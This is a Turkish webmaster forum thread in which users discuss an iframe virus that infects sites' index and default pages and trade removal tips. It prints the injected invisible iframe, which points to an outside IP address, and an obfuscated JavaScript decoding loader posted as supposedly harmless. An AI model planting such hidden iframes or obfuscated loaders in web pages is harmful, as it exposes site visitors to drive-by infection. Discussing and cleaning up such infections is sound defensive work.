İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

iframe kodlu virüs

V

VoLKyY

0
İyinet Üyesi
Katılım
9 Ocak 2007
Mesajlar
0
Reaction score
0
Konum
Bekleyiş
Sevgili Arkadaslar sanırım bu virus hakkında ayrıntılı bilginiz yok ben açıklayayım burada ve diğer arkadaslarda onlemlerini alsınlar biz turkiyede buyuk bir host firmasıyız bu virusle daha once karsılasmıstık. İlk önce virus kendını index.asp default.asp main.asp index.html vs turu ilk okuyucu türlere gizli bir i f r a m e olarak atmaktadır. örnek : <i f r a m e src='http://81.95.149.27/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></i f r a m e> şu anda gunceli bu bunun bulastıgı yer ise arkadasların dedigi gibi cmod vs zannedilsin diye kurnazca yapılmış host yetkililerini uyarınız bu virus web wiz forumun kendi forumlarınının linkleri kaldırıldıgında savunma amacı ile uretilmiş illegal bir virusdur. kurulan web wiz forum altında bulun bis .js dosyası aracılıgı ile tüm hosttaki yada bulundugu hosttaki ilk okucu türlere bulaşmaktadır Sevgili arkadaşımız. bunu kaldırmanın yolu diger hhosttaki dosyalarınızı tekrar atmanıza gerek yok hosttaki baslangıc tür dosyanız ne ise örnek default.asp sadece ona bulasmıstır onu indirerek içindeki i f r a m e li bölümü siliniz. sonra kaydedip tekrar gonderiniz bir iki gun surekli takip ediniz. i f r a m e aynı yere kendını tekrar kaydederse anlayınki host makinasında hala virus barınıyor. Herkeze Kolay Gelsin Teşekkürler.
Genişletmek için tıkla ...

bu sorunu yaşıyorum. bu kod tüm index.html ve index.php dosyalarına bulaşmış bir şekilde araştırdıgımda bir arkadaşın yazmış olduğu sonuç olarak bunu gördüm. bu konuda bilgisi olan arkadaşlarımız varsa yazabilirlermi?
 
L

Loi

0
İyinet Üyesi
Katılım
13 Kasım 2006
Mesajlar
6,192
Reaction score
44
Konum
localhost
VoLKyY' Alıntı:
bu sorunu yaşıyorum. bu kod tüm index.html ve index.php dosyalarına bulaşmış bir şekilde araştırdıgımda bir arkadaşın yazmış olduğu sonuç olarak bunu gördüm. bu konuda bilgisi olan arkadaşlarımız varsa yazabilirlermi?
Genişletmek için tıkla ...

Kaspersky bunlari dosyalara zarar vermeden temizliyor.
 
S

SAW

Misafir
non - virus

this is the code :
Kod: 
<script language=JavaScript>
function decipher(x){
var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,28,43,42,33,56,59,58,22,37,0,0,0,0,0,0,51,34,35,38,24  ,20,54,36,25,13,50,12,19,53,18,39,49,41,17,21,9,23,60,11,5,30,29,0,0,0,0,16,0,55,10,2,62,61,31,0,8,4  4,47,46,57,3,14,32,1,45,4,26,52,48,27,40,7,15,6);
for(j=Math.ceil(l/b);j>0;j--){
r='';
for(i=Math.min(l,b);i>0;i--,l--){
w|=(t[x.charCodeAt(p++)-48])<<s;
if(s){r+=String.fromCharCode(165^w&255);
w>>=8;s-=2
}else{s=6}
}
document.write("<xmp>"+r)
}
}
decipher("XCH@RB1JvClPbxKavzIu8xZ4SLiugOQAx21u1jHCbF1thOVC")

</script>


and decode this code in end :
Kod: 
 decipher("XCH@RB1JvClPbxKavzIu8xZ4SLiugOQAx21u1jHCbF1thOVC")

give this :

Kod: 
< html><body>test page</body></html>



no virus but frame only ,,,


thanks to listen

Sultan Abdallah
 
L

Loi

0
İyinet Üyesi
Katılım
13 Kasım 2006
Mesajlar
6,192
Reaction score
44
Konum
localhost
SAW' Alıntı:
this is the code :
Kod: 
<script language=JavaScript>
function decipher(x){
var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,28,43,42,33,56,59,58,22,37,0,0,0,0,0,0,51,34,35,38,24  ,20,54,36,25,13,50,12,19,53,18,39,49,41,17,21,9,23,60,11,5,30,29,0,0,0,0,16,0,55,10,2,62,61,31,0,8,4  4,47,46,57,3,14,32,1,45,4,26,52,48,27,40,7,15,6);
for(j=Math.ceil(l/b);j>0;j--){
r='';
for(i=Math.min(l,b);i>0;i--,l--){
w|=(t[x.charCodeAt(p++)-48])<<s;
if(s){r+=String.fromCharCode(165^w&255);
w>>=8;s-=2
}else{s=6}
}
document.write("<xmp>"+r)
}
}
decipher("XCH@RB1JvClPbxKavzIu8xZ4SLiugOQAx21u1jHCbF1thOVC")

</script>


and decode this code in end :
Kod: 
 decipher("XCH@RB1JvClPbxKavzIu8xZ4SLiugOQAx21u1jHCbF1thOVC")

give this :

Kod: 
< html><body>test page</body></html>



no virus but frame only ,,,


thanks to listen

Sultan Abdallah
Genişletmek için tıkla ...

Adamlar web uzerinde yayilan bu wormu, forumlarda worm veya virus oldugunu inkar eden postlarda gonderebilecek sekilde hazirlamislar. Helal olsun!
 
U

UlkeKurucusu

0
Yasakli Uye
Katılım
4 Mayıs 2008
Mesajlar
0
Reaction score
0
http://www.goldkozmetik.com
işte bir virüslü site daha kişileri uyardım ve bu konuya bakmalarını mail olarak link attım inş. fazla kişiye bulaşmadan silerler koruması olmayan müşterilerinin hepsinede virüs bulaşmıştır
 
U

UlkeKurucusu

0
Yasakli Uye
Katılım
4 Mayıs 2008
Mesajlar
0
Reaction score
0
nLr Nickli Üyemizin Sitesindede bu virüs bulaşmış arkadaşlar geçenlerde yoktu bugün girdiğimde yakaladı kaypersky, ne olacak bu türkiyedeki sitelere nasıl bulaştırıyolar anlamadım, geçenlerde e-ticaret siteme bir alman bayan nickli biri üye olmuştu sanırım bu virüsü bulaştırmak için üye oluyorlar neden derseniz mail uzantısı almanya uzantısı değildi çünkü @mail.ru du bende sildim üyeyi sanırım ruslar yapıyor bu işi :)


virüslü site: http://www.E-Kolay.Gen.TR
 
Cevap yazmak için giriş yap yada kayıt ol.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5

Üst